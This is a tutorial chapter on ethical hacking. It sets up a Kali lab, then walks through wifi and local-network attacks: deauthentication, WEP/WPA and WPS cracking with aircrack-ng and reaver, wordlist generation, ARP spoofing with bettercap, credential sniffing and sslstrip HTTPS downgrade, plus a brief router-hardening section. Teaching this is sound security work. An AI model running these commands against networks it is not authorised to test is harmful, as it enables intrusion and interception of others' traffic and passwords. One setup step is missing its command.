
ETHICAL HACKING.

Chapter 1: Network Hacking


Section 1: Introduction.

Hacking has become a part of our day-to-day life. Hacking is identifying and exploiting weaknesses in computer systems and/or computer networks. Cybercrime is committing a crime with the aid of computers and information technology infrastructure. Ethical hacking is about improving the security of computer systems and/or computer networks, and it is legal. Here, we are going to cover ethical hacking from A to Z.

In this section, we are going to see how to set up penetration testing labs and how to install the software needed for safe hacking practice. There are four main sections in ethical hacking:
1. Network Hacking
2. Gaining Access
3. Post Exploitation
4. Website Hacking

In simpler words, hacking is being able to access other systems and remote computers, so that we can gain information from them. The three types of hackers are:
1. Blackhat hackers: this is illegal; they hack other systems and demand money.
2. Whitehat hackers: they only hack systems for which they have permission. They are otherwise called ethical hackers.
3. Greyhat hackers: a combination of both whitehat and blackhat; this is also a kind of illegal.

There is always a doubt in everyone's mind: why learn hacking and what is its use? It is an existing industry, and hacking has a lot of job opportunities in different MNCs, as there is a huge demand for ethical hackers to secure systems from black hat hackers.

Section 2: Hacking Lab Setup.

Lab setting:
To proceed with the hacking process, there are a few prerequisites to be set up in our system, and we call it a lab. To create a lab, we need:
Hacking machines: if you are hacking other machines.
Websites to hack: if you are hacking websites.
Networks to hack: if you are hacking networks.

Instead of setting up all these different requirements, you can do all of this on your computer by installing everything as virtual machines. Everyday computers can be used to install virtualization software such as VirtualBox or VMware.
It allows us to create several virtual computers inside the main computer. We can even have ten virtual computers installed on the main computer and do everything on a single computer. Using virtual machines we can set up Kali Linux as the hacking machine and two other machines as target machines for learning and practice. By using a VM you will not lose any functionality on your main computer. All machines are going to be isolated, and you gain so many new features. We will see more about it in the upcoming modules.

Initial preparation:
The first operating system to install in our lab is Kali Linux. Using an operating system designed for hacking reduces our time and effort. It is a Linux distro based on Debian; the main difference between Kali Linux and the original Debian is that Kali Linux has a lot of hacking and testing tools pre-installed and pre-configured. You can install Kali Linux both as the main machine and as a VM, but here we are going to download it as a VM. Download Kali Linux from the link:
https://zsecurity.org/download-custom-kali/

Download Kali Linux according to the configuration of your system: if you have a 64-bit or 32-bit system, download the matching version from one of the links. While the file is downloading, we have to check whether virtualization is enabled in the system. This is only needed on Windows/Linux, because macOS and all Apple computers come with virtualization enabled by default. Before enabling it, check whether it is already enabled. To check:

Go to Start → Task Manager.
Click More details → Performance.
At the bottom of the Performance tab, check Virtualization; if the status is Disabled, it should be enabled manually with a few steps.

To enable virtualization:
Reboot your computer.
While the system is turning on again, enter the BIOS settings. To enter the BIOS settings, a set of keys has to be pressed depending on your system.
Press the key that is relevant to your computer. The BIOS settings window opens.
To enable virtualization, look for VT-x, AMD-V, SVM or Vanderpool, enable it and exit the window.
The computer restarts with virtualization enabled.

Kali Linux as VM on Windows:

Open the zip file of Kali that you downloaded and extract it using the 7-Zip extractor. It will uncompress the archive and extract the files inside.
The extracted file is designed to run inside VMware as a virtual machine.
In order to run it, VMware Workstation Player should be downloaded from the following link:
https://www.vmware.com/products/workstation-player.html
Download the Windows version; after the download is complete, install it like any similar software and finish the process.
Now we can run the VM in VMware.
Start VMware. Click on Open a Virtual Machine, or go to Player → File → Open, and select the downloaded Kali file in its location. Open the VMware VM folder and open the single file inside.
If you want to change any configuration of the Kali virtual machine, such as memory, processors, hard disk storage or network adapter, go to Edit virtual machine settings and make the necessary changes.
Once you are ready to run the virtual machine, click on the green play button to start it.
A login screen appears; enter the login credentials:
Username: root Password: toor
Kali runs on the Windows OS, and now we can use it as a hacking machine on top of the host OS.
If the virtual machine display is too small, you can adjust the resolution in Settings → Display → Scale and adjust it according to your needs.

Kali Linux as VM on macOS:

Uncompressing an archive file on macOS is very easy. Just double-click on the file; it will automatically start extracting and create a directory.
Download the macOS version of VMware from https://www.vmware.com/products/workstation-player.html and register for the free licence with your details. Verify your account with your email.
Install VMware and allow access.
Since macOS has virtualization enabled by default, just double-click on the Kali Linux VM file. It will automatically start running in VMware.
Login with the default credentials:
Username: root Password: toor
Kali Linux starts running on the host OS.
To turn off Kali, go to the top of the screen, select Power off and again Power off. The virtual machine will shut down.
At the top you can see VMware Fusion; if you click it you can see the VM machines that are installed.
If you want to modify any settings, you can change them in Settings by right-clicking on the VM.

Kali Linux as VM on Linux:

Uncompress the downloaded Kali archive by right-clicking on it and selecting Extract here. The extracted file will automatically create a directory.
Download the Linux version of VMware:
https://www.vmware.com/products/workstation-player.html
To install the software, go to the terminal. Change the working directory to where VMware was downloaded using the cd command.
Before running the VMware installer, its permissions should be changed to make it executable. To do that, type the command chmod +x filename in the terminal.
Now we should install the build essentials. For that, type the command sudo apt-get update
Enter the password and press Enter.
Once the sources are updated, give the command sudo apt-get install build-essential
The build essentials will be installed. After the essentials, to install VMware use the command ./filename
It should be run as admin, so give sudo ./filename
VMware gets installed like normal software. Finish the process.
Start VMware. Click Open virtual machine, or File → Open VM, and select the Kali file from the downloaded location.
It will be imported into VMware.
To start it, click on Power on.
If a warning popup window opens, click on the option I copied it.
If an update popup window opens, click on the options you need.
Login with the credentials:
Username: root Password: toor
Now Kali Linux is installed on our main host OS.

Section 3: Basics of Linux.

Basic overview:
1. Left top corner of the status bar
It has two options, the Applications menu and Places. The Applications menu contains applications categorized as information gathering, vulnerability analysis, web application analysis, reverse engineering, etc.
The Places option shows the most commonly visited places in the system. It is more of a shortcut so that you can access the files from there.
2. Right top corner of the status bar
The right corner contains workspaces and the other icons. Linux by default comes with different workspaces. You can work in many workspaces at the same time; as you fill the workspaces you are using, Linux keeps creating new ones. The shortcut to switch between workspaces is Ctrl+Alt+Up/Down.
The last icon has various options like sound control, the list of available connections and the connected network. In Kali running as a VM, only external USB adapters can be used for wifi, not built-in wifi cards. Kali should have an internet connection for usage. There are also battery and user settings.
3. Application bar
It has a list of application icons that are regularly used, and if you expand the bar you can view all applications.

Terminal and Linux commands:

The Linux terminal is more powerful than other terminals, as it can do anything: there is a command for anything and everything in Linux. Here are a few Linux commands. The website explainshell.com can be used to learn about the description and usage of Linux commands.

Section 4: Network Hacking

Network penetration testing:

Everything is connected to a network, whether the target you take is a personal computer, a server or a website. When we connect to an internet connection, we are connected to a network. So it is important to know how a network works. There are three subsections in network penetration testing:

1. Pre-connection attacks: here you will learn about all the attacks one can do before connecting to a network.
2. Gaining access: here you will learn how to crack wifi keys and gain access to wifi networks.
3. Post-connection attacks: here you will learn about a number of powerful attacks that allow you to intercept and capture everything including passwords, URLs, chats, etc. This applies to both wifi and wired networks.

Basics of Network:
A network contains a number of clients connected to each other, and clients connect to a network to share resources. We are often connected to a network to access the internet. For example, consider your personal wifi: it has a router, which is the common server, called an access point. The server/router/access point is the only device that has access to the resource, and the resource is nothing but the internet we are connected to. The connection to the internet is only through the access point.

For example, if you connect your computer to the internet and open google.com, your computer sends a request to the access point. The access point has access to the resource, so it looks for google.com in the resource, and when it receives it, it forwards the response to your computer. This is how your wifi works: only the access point/server has direct access to the resource. The only way for any computer to access the internet is to go through the access point.
Now, the data is transferred between the client and the access point as packets. The series of packets travel as requests and responses. In wifi networks, these packets are transmitted through the air. Therefore, if you have a wireless card and are within range, you can capture these packets.

Connecting a wireless adapter to Kali:

This module is about how to connect a wireless adapter to a virtual machine. There are a few requirements for a wireless adapter to be used with the virtual machine. Here are the requirements for a wireless adapter:
1. Monitor mode
2. Packet injection
3. AP mode

Recommended chipsets:
1. Realtek RTL8812AU
2. Atheros AR9271
When it comes to an adapter, the brand is irrelevant. You can go with any brand that has one of these two chipsets, as long as it is supported by Kali, because the chipset is the brain of the adapter. To connect the adapter to the virtual machine:
Start VMware. Right-click on the Kali machine and open Settings.
Click on Add → USB Controller → Finish.
In the USB compatibility, set it to USB 3.1.
Check the “Show all USB devices” check box and click OK.
Before connecting it to Kali, make sure you have disconnected the wireless adapter from your host computer if it was already connected.
Start Kali and log in.
Open the terminal and run the command ifconfig.
This command lists all of the network interfaces connected to this computer. It shows only the default interfaces as of now.
Now connect the USB adapter to your computer. A popup window appears. Select the “Connect to a virtual machine” option, select the virtual machine you want to connect it to and click OK.
If you run the same command, ifconfig, again, it will show the interface of the USB adapter you connected.
Changing MAC address:
Open the terminal and type the command ifconfig.
The list of available network interfaces appears. The first two, eth0 and lo, are the default interfaces created by Linux, and wlan0 (in this case) is the wireless adapter you connected.
The ether field of wlan0 is the MAC address of your adapter. The ether field is what should be changed in order to change the MAC address of the wireless adapter.

To change the value of the MAC address, the interface should be disabled first. To disable it, use the command:
ifconfig interface_name down
If it runs with no error, it means it got executed.
Next, we want to change the necessary option of the particular interface, i.e. the ether field. To change the ether field:
ifconfig interface_name hw ether new_mac_address

After changing the options of the interface, the interface should be enabled again. To enable it:
ifconfig interface_name up
If you run ifconfig again, the interface list appears with the newly changed MAC address of your USB adapter.
Remember that the MAC address will go back to its original value when you restart the computer, because we are only changing the address in memory and not the actual physical address.

Wireless modes:
Whatever you do on the internet, it is always sent in packets from your computer to the access point. A packet travels from the source MAC to the destination MAC.
Since these packets are sent through the air, if you are within range you will be able to capture the data without even being the destination MAC.
To do this, you need to change the mode of operation of your wireless interface to monitor mode.
Go to the terminal and run the command iwconfig
This command only shows the wireless interfaces, and the default mode is “Managed”.
It means the device can only capture packets whose destination MAC address is the Kali machine's own.
So this mode should be changed to access the other packets. Before changing any option of your interface, the interface should be disabled.
To disable the interface:
ifconfig interface_name down
Now, before changing the mode, run a command that kills the processes that would interfere with the interface while it runs in monitor mode. Run the command:
airmon-ng check kill

Now to enable monitor mode, use the command:
iwconfig interface_name mode monitor
After changing the mode, enable the interface with the command:
ifconfig interface_name up
The mode is changed to monitor, and now we can capture any packets directed to any destination MAC within range.

Also, note that not all adapters support monitor mode, so make sure the adapter you use supports it.

Section 5: Network Hacking-pre connection attacks

Packet sniffing:
Now that we are in monitor mode, we can capture packets that are not directed to our computer. For that, we need a program. The program we are going to use is airodump-ng.
It is a packet sniffer and it is designed to capture packets while you are in monitor mode. It allows you to see all the wireless networks around and shows detailed information about each one: the MAC address, its channel, its encryption and even the clients connected to the network. Let's see how to use it.

Go to the Kali virtual machine and enable monitor mode in the terminal.
To run the program, use the command:
airodump-ng interfacename_inmonitormode

It will start discovering all the wireless networks and displaying information about them.
To stop the program, press Ctrl+C.
ESSID: names of the wireless networks around
BSSID: the MAC address of the target network
PWR: signal strength of the network
Beacons: frames sent by the network in order to broadcast its existence
#Data: number of data packets/data frames captured
#/s: number of data packets we collected in the last 10 seconds
CH: channel the network works on
MB: maximum speed supported by the network
ENC: encryption used by the network
CIPHER: cipher used by the network
AUTH: authentication used on the network

You will learn more about ENC, CIPHER and AUTH in the upcoming sections.

Wifi bands - 2.4GHz and 5GHz frequencies:

The band of a network defines what frequency is used to broadcast the network. It also defines the frequency that clients or computers must support in order to connect to the network. The two main frequencies used in wifi networks are 2.4 and 5 gigahertz.
By default, airodump-ng only picks up networks on 2.4 GHz, so it does not show all the available networks around. In order to make the program pick up 5 GHz channels, use the command:
airodump-ng --band a interface_name

Here 'a' is the band argument for 5 GHz. Now all the networks, including the 5 GHz networks, will be available in the list.

You can also specify multiple bands using the band argument:
airodump-ng --band abg interfacename
Here, abg captures the data of both 2.4 and 5 GHz at the same time.

To run airodump-ng like this, you need a more capable adapter, and it will be slightly slower than sniffing only one band. Sniffing abg might take longer to provide results, but you will be able to capture all the data sent over both 2.4 and 5 GHz.

Packet sniffing a targeted network:

In this module, we are going to see how to sniff the packets of a target network. For example, consider a target network from the airodump-ng list shown above. Since we know what the target network is and some basic information about it, let's run airodump-ng against it to gather more information. Use the command:
airodump-ng --bssid bssid_ofthenetwork --channel channelnum --write filename interfacename
The file is to save the captured data. Now this command shows only the specified network and its data.

Below the network is the list of client devices connected to the network specified in the above command:
Station: MAC address of the devices
PWR: signal strength
Rate: speed of the connection
Lost: the amount of data lost
Frames: the number of frames/packets that we captured
Probe: the name of the network, if any of the devices are looking for other networks

When you stop airodump-ng, new files will be created in your current working directory with the data we captured. To list all the files in the current directory, give the command ls
Here four files named test are created with different extensions. Airodump-ng automatically added -01 to the filename, so remember to use the same file name for future use. The file test-01.cap contains all the data we captured during the process. It contains the URLs, usernames, passwords and chats of all the devices, because to do anything on the internet they have to go through the router.

But here the packets are encrypted, because the network uses encryption, so we cannot see the data in the packets (you can see that the packets are encrypted with WPA2 in the ENC column). If it is an open network, you can easily see all the data from the captured packets. In the next section, you will learn how to break the encryption and gain access.

Deauthentication attack:
This attack allows us to disconnect any device from any network before connecting to any of these networks, without even knowing the password to the network. To do this, we are going to pretend to be the client by changing our MAC address to the client's, followed by pretending to be the router, until the device is disconnected. For this, the command aireplay-ng is used.
Go to the terminal and give the command:
aireplay-ng --deauth numberofthe_deauthpackets -a MACaddress_oftargetnetwork -c MACaddress_oftheclient interfacename

For the number of deauth packets, give a really large number so that it keeps sending requests to both the router and the target device and the connection stays down for a longer time.

This command will disconnect the target device only from the specified network. Only after quitting the aireplay-ng command will the target device be able to connect back to this network. If there are any available networks with known passwords, the device will automatically connect to them after disconnecting from this network.

Section 6: WEP Cracking.

In the previous sections, everything could be done without connecting to the target network. The upcoming sections will be more about connecting to the target network and capturing all the data from the devices. In this section, we will learn how to break into encrypted target networks and gain access, whether they use WEP, WPA or WPA2. Once we get the key, we can connect to the network.

WEP Encryption cracking:

WEP (Wired Equivalent Privacy) is an old encryption scheme; it is simple and can be easily broken. WEP uses an algorithm called RC4 to encrypt the data packets it sends.

Working:
Suppose a client sends something to the router, for example a text. The transmitter encrypts the text using a key and converts the normal text to gibberish. This encrypted packet is then sent to the router through the air, and if a hacker captures the packet now, it will be full of gibberish, as we saw in the previous sections.
The access point is able to decrypt the encrypted message because it has the key. The same procedure happens when the router wants to send a message. The RC4 algorithm itself is fine; the problem is with the implementation.
WEP generates a unique key for each packet when sending it to the router. To do that, it generates a random 24-bit initialization vector (IV). This IV is then added to the password that people use to connect to the network. This generates a keystream, and this is what encrypts the data packet. Before sending the packet into the air, WEP appends the IV as plain text, because the router will only be able to decrypt the packet with the key and the IV.
When the packet reaches the router, with the key and the IV the router generates the keystream and transforms the gibberish back into the actual text.

Weaknesses of the WEP implementation:

The initialization vector is too small, only 24 bits. Since the IV is appended to the encrypted packet, if the packet is captured, the hacker will be able to read the IV, as it is sent in plain text. If the network is busy, IVs will be repeated, making WEP vulnerable. This can be used to find the keystream and decrypt the data.
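Added example, not part of the course notes: a short calculation of how quickly a 24-bit IV space is used up, using the birthday bound plus a seeded simulation of random IV selection. The traffic rate of 500 packets per second is an assumed figure for illustration only.

```python
import math
import random

IV_BITS = 24                 # WEP sends a 24-bit IV in the clear with every packet
IV_SPACE = 1 << IV_BITS      # 16,777,216 possible IV values


def iv_collision_probability(packets: int, iv_space: int = IV_SPACE) -> float:
    """Probability that at least two of `packets` randomly chosen IVs coincide.

    Birthday-problem approximation P = 1 - exp(-n(n-1) / (2N)); accurate to
    a few decimal places while n is much smaller than N.
    """
    if packets < 2:
        return 0.0
    return 1.0 - math.exp(-(packets * (packets - 1)) / (2.0 * iv_space))


def expected_packets_until_repeat(iv_space: int = IV_SPACE) -> float:
    """Expected number of packets before the first IV is reused: sqrt(pi*N/2)."""
    return math.sqrt(math.pi * iv_space / 2.0)


def seconds_to_exhaust_ivs(packets_per_second: float, iv_space: int = IV_SPACE) -> float:
    """An implementation that simply increments the IV wraps around after N
    packets; this is how long that takes at a given traffic rate."""
    return iv_space / packets_per_second


def simulate_iv_repeats(packets: int, seed: int = 1, iv_space: int = IV_SPACE) -> int:
    """Draw `packets` random IVs (the behaviour of an AP that picks IVs at
    random) and count how many reuse an IV that was already sent."""
    rng = random.Random(seed)   # fixed seed so the run is reproducible
    seen = set()
    repeats = 0
    for _ in range(packets):
        iv = rng.randrange(iv_space)
        if iv in seen:
            repeats += 1
        else:
            seen.add(iv)
    return repeats


if __name__ == "__main__":
    print(f"IV space: {IV_SPACE:,} values")
    print(f"Expected packets until the first repeat: {expected_packets_until_repeat():,.0f}")
    for n in (1_000, 5_000, 10_000, 50_000):
        print(f"P(at least one repeated IV after {n:>6,} packets) = {iv_collision_probability(n):.3f}")
    # 500 packets/s is an assumed rate for a moderately busy network.
    print(f"At 500 packets/s a counter IV wraps around in {seconds_to_exhaust_ivs(500) / 3600:.1f} hours")
    print(f"Repeated IVs seen in 50,000 simulated packets: {simulate_iv_repeats(50_000)}")
```

A repeat is more likely than not after only about 5,000 packets, which is why a busy network yields reused IVs within minutes.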
WEP cracking:
In order to crack WEP, we need to capture a large number of packets, or IVs, because they will be repeated, and the tool aircrack-ng can be used to recover the key from the IVs. To capture the data, use airodump-ng as in the previous section, and to analyze the captured IVs we use aircrack-ng.
Go to the terminal, put the adapter in monitor mode and run airodump-ng only on the target network. The target network should be a busy network that sends a lot of packets.
After running airodump-ng, list the files in the current working directory. To crack the key, use the command:
aircrack-ng filename

The key is found from the IVs. Now we can connect to the target network with the ASCII password or the key.
Copy and paste the key in the terminal and remove the colons between the numbers.
Now, on your host machine, connect to the target network and paste the copied key in the password tab.

Now we have broken the encryption and are connected to the target network.
Fake authentication attack:
During the cracking of WEP, it was mentioned that the network should be busy, but if the network is not busy, the number of data packets will increase slowly and that increases our waiting time.
The solution to this is to force the access point to generate new packets with new IVs. To do this, associating with the network is important, because access points deny requests from clients that are not associated with them.
Remember, this is not connecting to the network but letting the network know that we want to communicate with it; for example, clicking the wifi network to connect, before entering the password.
1. Go to the terminal and run airodump-ng against the target network.
2. To associate with this network we are going to use the program aireplay-ng:
aireplay-ng --fakeauth 0 -a bssid_ofnetwork -h MACaddress_ofadapter adaptername

0: do this process only once
-a: specify the MAC address of the target network
-h: specify the MAC address of the wireless adapter
3. To get the MAC address of your adapter, run ifconfig in another terminal. The first 12 hex digits of the unspec value are your MAC address.

4. Replace the - in the address with : and run the command. Before running the command the AUTH column will be empty, and after running it will show the authentication as open, with new clients.

5. Now we are associated with the target network and can communicate with it.
ARP request replay attack:
Since we are associated with the network, we can now force the access point to increase the number of packets quickly. It will allow us to crack WEP networks even if they are not busy.
The most reliable method to do this is using an ARP request replay attack. It works against most networks if you have a good signal and a good wireless adapter.
Here the process is to:
1. Wait for an ARP packet; it is a special kind of packet (you will learn more about it in the upcoming sections).
2. Capture it and retransmit it. By doing this the access point will produce more packets with new IVs.
3. Once we have enough IVs, the program aircrack-ng can be used to crack the key.
4. Continue from the last process you did, i.e. associating with the network.

Use the command:
aireplay-ng --arpreplay -b bssid_targetnetwork -h MAC_adapter adaptername
It is very similar to the fake authentication command, but instead of fakeauth, the arpreplay attack is used.
Now the program is waiting for an ARP packet; once one is transmitted, it is going to capture and retransmit it.
Wait for some time; when the number of data packets keeps increasing, it means we captured an ARP packet.

Before running aircrack-ng, associate with the network one more time. To run aircrack-ng:
aircrack-ng filename

After running, the command finds the key. The target network is cracked without it sending data on its own, just by forcing the AP to generate new packets.

Section 7: WPA/WPA2 Cracking

Here, you will learn about cracking WPA and WPA2 networks. Both are very similar, except for the difference in encryption integrity. These techniques came into existence after acknowledging the weaknesses of WEP, so they are more secure and cracking them is challenging.

Before learning how to crack the network, it is essential to know about a feature that can be exploited to recover the key without having to crack the encryption. The feature is called WPS.

It allows devices to connect to the network easily.
The authentication of WPS is done with only an 8-digit PIN, which makes the process easy and quick.
For this to work, WPS should be enabled on the network and needs to be misconfigured. This method will not work if push-button configuration (PBC) is enabled.
WPA/WPA2 hacking without wordlist:
Open the terminal in the Kali machine with monitor mode enabled.
In the previous section, the airodump-ng command was used to see all the networks around us, but now we need only the networks that have WPS enabled. To do that a tool called wash is used:
wash --interface interfacename

This command will list the networks.

Now that we know the target uses WPS, there is a higher chance that this attack will work. It only fails if the target network uses PBC, because it will refuse all the PINs unless the button is pressed.
First, associate with the target network using a fake authentication attack, because that is when the network will start to accept the PIN. Use the command used for WEP. Before running this command, open another terminal and run the program reaver, which brute-forces the 8-digit PIN; only after this should the network be associated, otherwise it will fail.
Run the program:
reaver --bssid bssid_oftarget --channel channel_oftarget --interface adaptername -v --no-associate
-v: show more information
--no-associate: tell reaver not to associate with the target, as we are doing it manually.
Now associate with the target network in the previous terminal.
After associating, the reaver program runs and finds the PIN.
With this PIN, we can connect to the network and see and decrypt all the packets in the air.
Capturing the handshake:
If WPS uses PBC, then the actual WPA key should be cracked. The same method used for WEP cannot be used to crack WPA/WPA2, because the keys are unique and temporary, so the packets contain no useful information. The packets that do contain useful information are the handshake packets. These are four packets sent between the client and the router when a client connects to the network.

Run airodump-ng for all the networks around.
Copy the MAC address of your target network.
Run airodump-ng for the target network and save it to a file as we did for WEP.

airodump-ng starts running; now wait until the handshake packets are captured.
Alternatively, we can also use the deauthentication attack to disconnect a client from the network, so that the client automatically connects again once the attack is stopped. This way we save waiting time.
Once the client connects again, the handshake is captured.
Now the data is saved in the file given.
Wordlist creating:
The handshake packets do not contain any information that will help us crack the WPA key directly. They only help us check whether a password we try is valid or not. So we are going to create a wordlist that has various combinations of passwords. Then these passwords can be checked against the handshake packets. To create a wordlist, a tool called crunch is used:

crunch [min] [max] [characters] -t [pattern] -o [filename]

crunch: name of the tool
[min] [max]: minimum and maximum number of characters for the passwords to be generated
[characters]: characters that you want to generate passwords from
-t: to give a pattern; optional
-o: to specify the filename where the passwords should be saved

You can learn more options of crunch with the command man crunch
Here crunch has generated 484375 passwords, which are stored in the text file. Open the file using the command cat filename

Cracking WPA/WPA2
With the wordlist created, we are going to crack the WPA2 key using the handshake packets. aircrack-ng unpacks the handshake and derives the useful information from it. The message integrity code (MIC) in the handshake is the value used to verify a password:
The MIC is separated from the handshake, and the other information in the packets is combined with the first password in the wordlist. That combination produces a new MIC, which is compared with the MIC already present in the handshake.
If both MICs match, the password is correct; if not, it moves to the next password and the steps are repeated.
This check runs for every password in the wordlist until the correct password is found.
Run the aircrack-ng command to crack the password:
aircrack-ng <handshake_filename> -w <wordlist_filename>
aircrack-ng runs the wordlist against the handshake file, testing each password in turn.
The speed of this process depends on the processor. After running through all the passwords in the wordlist, the correct password will be shown with the key found message.
Section 8: Securing your device

To secure your network from hackers:
1. Avoid using WEP encryption, as it is easy to crack.
2. Use a WPA2 network with a complex password.
3. Make sure that the WPS feature is disabled in your network.

Configuring wireless settings:
Run the command, ip route; it shows the default gateway in the current network.
With the IP address of the default gateway, the necessary changes can be made in the network settings.
Copy the IP address, paste it into the web browser and press enter.
Log in with your router credentials and, once logged in, make the changes as follows:
1. In the wifi settings, make the network hidden so it does not broadcast.
2. The security should be WPA2 Personal for maximum security.
3. The password should be long; change it if it is not.
4. If the WPS authentication tab is enabled, disable it and apply the changes.
5. The router will restart with the new settings.
6. If you cannot connect to your wifi network afterwards, you can connect using an ethernet cable; this way a deauthentication attack will not work against you.
Section 9: Post-connection attacks

Post-connection attacks are attacks that can be done after connecting to the target network. To run post-connection attacks and gather information or intercept data, there are two options:
1. Run the attacks against the virtual NAT network, targeting the Windows virtual machine. Just make sure that the Windows virtual machine is connected to the same network as the Kali machine.
2. Run the attacks against real computers connected to real wifi networks. Make sure that a wireless interface is connected to the Kali machine and that the Kali machine is connected to the target network.
Install Windows as a virtual machine:
To practice hacking and running attacks, it is recommended to have the target machine as a virtual machine, because it is easy to fix if something breaks. Microsoft has released many virtual machines that can be downloaded for free. Here is the link for downloading:
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
Open the link.
Select MSEdge on Win10 (x64) Stable 1809 in the virtual machine tab.
Select VMware as the VM platform and download the zip file.
After downloading, uncompress and extract the file. Once the file is extracted, open VMware.
Go to File → Open → select the extracted Windows file and click Open.
Change the name if needed and click Import.
Before importing you can reduce its memory, because it needs only a little.
Start it by clicking the play button.
Log in with the default password, Passw0rd!, and hit enter.
Now the complete Windows VM is installed inside the host machine.
Discovering devices on the same network:
Information gathering is an essential step when it comes to hacking or penetration testing. You cannot gain access to a system if you don't know any basic information about it.
For example, consider that you are connected to a network and one of the devices connected to that network is your target. Initially you need to discover all of the clients connected to that network and obtain their MAC and IP addresses. There are programs like Netdiscover and Nmap to do this and save you time. Let's see how to use Netdiscover to map all the clients of the network you are connected to.
Run the command, ifconfig, to get your IP address and then use the netdiscover program:
netdiscover -r <yourIPrange>
You can only reach IPs in the same subnet as yours. A range can start from 10.0.2.1 and end at 10.0.2.254, as 254 is the last IP a client can have. 10.0.2.1/24 is a simpler way of specifying the whole subnet.
This command will show the IPs of all the devices that are connected to the same network; the first three parts of the IPs are always the same, as they are from the same subnet. Press q to quit the program.

Gathering information about connected devices:
Nmap is a bit slower than Netdiscover but takes scanning to a different level and shows more information about the target. If you are in a network you can see more about the connected devices, and you may be able to bypass security and firewalls too. Zenmap is the graphical user interface of Nmap; let's see more about it.
Type the command zenmap and press enter. The Zenmap interface opens.
In the target input box, you can scan any IP within your reach. You can also enter a range, as with Netdiscover, and it will scan the whole range. As soon as you enter the target, the nmap command is filled in automatically in the command input box.
It runs the nmap command in the background and shows the results. You can also copy and paste the command into the terminal; it gives the same result.
The nmap command has various profiles that work at different speeds.
1. The Ping scan
It's a very quick scan: it pings all the possible IPs in the range and when it gets a response, it records it and shows us the devices with their MAC address and vendor. But many devices will not respond to a ping, so they may not be included in the list.
2. The Quick scan
It is slower than the ping scan but shows more information: the open ports of the devices and the services running on them.
3. The Quick scan plus
It is slower still, but takes the quick scan one step further and shows even more information:
1. The operating system running on the device.
2. The device type (phone/laptop/tablet).
3. The program, and its version, running on each port.
In the quick scan we got the open ports but didn't know the programs running on them. Knowing the running program is helpful for exploiting vulnerable services and gaining full control of the device that runs them.
The icons before the IP addresses show the type of OS on the devices. It now shows the versions of the services on the ports and the device types; with the versions we can look up their vulnerabilities. In the Services tab on the left, we can distinguish the devices based on the services running.
Section 10: Post connection: MITM attacks

ARP poisoning:
MITM stands for man-in-the-middle attacks; these attacks can be launched only if we can intercept the communication between two devices. Usually, the client contacts the resource/Internet through the router. Getting in the middle of that contact and gaining access to the data shared is called an MITM attack. There are many methods to do this; here, we are going to learn about ARP attacks. They allow us to redirect the flow of the packets: any packets or responses sent are made to flow through the hacker's computer. This allows the hacker to read, modify or drop the data.

ARP (Address Resolution Protocol) is a very simple protocol that links IP addresses to MAC addresses. The hacker system sends a request to all the clients connected to the network, asking who has a specific IP address. The client with that IP address sends a response to the hacker system. The hacker system then answers with that IP address as its own. Now the victim client thinks that the hacker system is the router, and the router thinks that the hacker system is the victim client.
We can do all this because ARP is not secure: clients accept responses even if they did not send a request, and they do not verify them.

Network traffic interception:
To intercept network traffic, there are a number of tools that run an ARP spoofing attack. Two simple and reliable tools are arpspoof and bettercap. arpspoof has been ported to many operating systems including iOS and Android, while bettercap has many more features. In this module, the working and features of arpspoof are covered.
Syntax of arpspoof:
arpspoof -i <interfacename> -t <clientIP> <gatewayIP>
Run the same command in another terminal with the gateway address as the target address:
arpspoof -i <interfacename> -t <gatewayIP> <clientIP>
The first command makes the victim believe that we are the router. The second command makes the router believe that we are the victim. Since our system is not a router, it does not forward packets by default. To make the packets flow, port forwarding should be enabled. To enable port forwarding,
If the command runs without any errors, it means packet forwarding has been enabled.

Basics of bettercap:
Bettercap can be used for what we did with arpspoof and much more. It can be used to capture data, analyze it, see usernames and passwords, bypass HTTPS and potentially bypass HSTS.
Syntax to start bettercap:
bettercap -iface <interfacename>
We are now inside the tool, with a different command prompt. To learn about the commands and modules of bettercap, use the command help, and to learn more about a specific command or module type:
help <command/modulename>
To identify connected devices in the network quickly, the command net.probe on is used. It shows all the connected devices in the network.
With the command net.show you can see more information on the connected devices.

ARP spoofing using bettercap:
Spoofing with bettercap places our computer in the middle of a connection, so that we can read the data the two sides are sending. To spoof both the target and the router, the option arp.spoof.fullduplex is used. By default it is set to false. Only if it is true can we spoof both the target and the router; otherwise only the target machine is spoofed.
To change an option of a module in bettercap, the syntax is:
set <option> <value>
If you don't get any error, it means it is changed.
Next, the target option (arp.spoof.targets) should be set to our target machine's IP.
Once the changes are made as expected, the tool can be used. Initially, turn on spoofing with arp.spoof on
Spying on network devices:
Now we are in the middle of a connection and all the data is flowing through our computer, so a program is needed to capture this data. A module that comes with bettercap is going to be used to capture it. The command is: net.sniff on
Now everything will be captured and analyzed by the Kali machine, including the URLs, websites visited, usernames and passwords.
Custom spoofing script:
Every time you want to intercept data, you need to do all the steps mentioned in the previous modules: net.probe on, turning arp.spoof on, changing its options and running net.sniff. But you can also make this automatic using a text file that contains all the commands to be run. Enter all the commands in a text file and save it.
Now we have to feed this file to bettercap so it runs the commands automatically:
bettercap -iface <defaultinterface> -caplet <capletfilename>
Now, if you type help, you can see the modules running automatically from the file.
If you check the ARP entries on your host machine with the command arp -a, you can see that the MAC address shown for the target has been changed to the address of the Kali machine.

HTTPS bypass:
The data interception we did in the previous modules works only with HTTP, because it sends data in plaintext; that's why a MITM can read all the data. To overcome this, HTTPS was created. It adds an extra layer to the data HTTP sends, which turns the data into gibberish, so even if the data is captured it cannot be read by anyone.
HTTPS uses Transport Layer Security (TLS), formerly Secure Sockets Layer (SSL), to encrypt the data, and it is very difficult to break. So to bypass it, the HTTPS connections have to be downgraded to HTTP. Since we are the MITM now, we can intercept the target's HTTPS requests and serve them HTTP instead. To do this, we have to configure a tool called sslstrip.
Open the text file we used to store the commands in the previous module and add one more command, which makes bettercap think that the passwords sent by the target were sent from our computer.
Go to the terminal and run the caplet command.
Bettercap comes with several caplets; to see all the caplets with their locations, use the command caplets.show
To run any of these caplets, you just have to give its name and it runs automatically. Go to your host machine, browse some websites and see whether they are reflected in the Kali machine. This method works on almost all websites that use HTTPS, except those that use HSTS, which is a little trickier to bypass.

HSTS bypass:
In the previous module, we saw that we cannot intercept HSTS websites. This is because modern browsers come by default with a list of websites that should only be loaded over HTTPS. With HSTS, the browser knows that the website should only be loaded over HTTPS and accepts it only if it comes back over HTTPS. As a MITM, we cannot do anything about it, as the browser checks the list locally, stored on the computer itself.
